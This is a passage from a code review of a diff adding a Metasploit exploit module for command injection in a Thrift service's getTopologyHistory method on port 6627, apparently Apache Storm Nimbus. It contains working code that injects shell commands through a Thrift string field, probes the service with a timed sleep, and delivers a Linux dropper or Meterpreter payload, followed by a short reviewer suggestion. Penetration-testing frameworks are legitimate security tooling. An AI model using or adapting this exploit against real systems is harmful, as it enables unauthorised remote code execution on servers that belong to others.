modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb

```diff
@@ -0,0 +1,149 @@
+        ],
+        'DisclosureDate' => '2021-10-28',
+        'License' => MSF_LICENSE,
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'RPORT' => 6627,
+          'MeterpreterTryToFork' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def check
+    begin
+      connect
+    rescue Rex::ConnectionError
+      return CheckCode::Unknown('Failed to connect to the service.')
+    end
+
+    sleep_time = rand(5..10)
+    response, elapsed_time = Rex::Stopwatch.elapsed_time do
+      execute_command("sleep #{sleep_time}", { disconnect: false })
+      recv_response(sleep_time + 5)
+    end
+    disconnect
+
+    vprint_status("Elapsed time: #{elapsed_time} seconds")
+
+    unless response && elapsed_time > sleep_time
+      return CheckCode::Safe('Failed to test command injection.')
+    end
+
+    CheckCode::Appears('Successfully tested command injection.')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    # comment out the rest of the command to ensure it's only executed once and prefix a random tag to avoid caching
+    cmd = "#{cmd} ##{Rex::Text.rand_text_alphanumeric(4..8)}"
+    vprint_status("Executing command: #{cmd}")
+
+    send_request([
+      Thrift::Header.new(message_type: Thrift::MessageType::CALL, method_name: 'getTopologyHistory'),
+      Thrift::Data.new(data_type: Thrift::DataType::T_UTF7, field_id: 1, data_value: ";#{cmd}"),
+      Thrift::Data.new
+    ].map(&:to_binary_s).join)
+    disconnect if opts.fetch(:disconnect, true)
+  end
+
+  def send_request(request)
+    connect if sock.nil?
+    sock.put([ request.length ].pack('N') + request)
+  end
+
+  def recv_response(timeout)
+    remaining = timeout
+    res_size, elapsed = Rex::Stopwatch.elapsed_time do
+      sock.timed_read(4, remaining)
+    end
+
+    remaining -= elapsed
+    return nil if res_size.nil? || res_size.length != 4 || remaining <= 0
+
+    res, = Rex::Stopwatch.elapsed_time do
+      sock.timed_read(res_size.unpack1('N'), remaining)
+    end
```

Comment:
@smcintyre-r7's own review thought!
```suggestion     
    res = sock.timed_read(res_size.unpack1('N'), remaining)
```